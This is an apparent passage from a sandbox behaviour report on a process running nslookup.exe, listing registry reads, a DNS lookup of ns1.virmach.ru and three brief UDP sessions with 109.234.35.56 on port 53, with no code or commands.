Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Module (1)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x70000 True 1
Network Behavior
DNS (2)
Operation Additional Information Success Count
Get Hostname name_out = x2vS1cum True 1
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
UDP Sessions (3)
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
Information Value
Handle 0x1a0
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Close type = SOCK_DGRAM True 1
UDP Session #2
Information Value
Handle 0x1a0
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Close type = SOCK_DGRAM True 1
UDP Session #3
Information Value
Handle 0x1a0
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Close type = SOCK_DGRAM True 1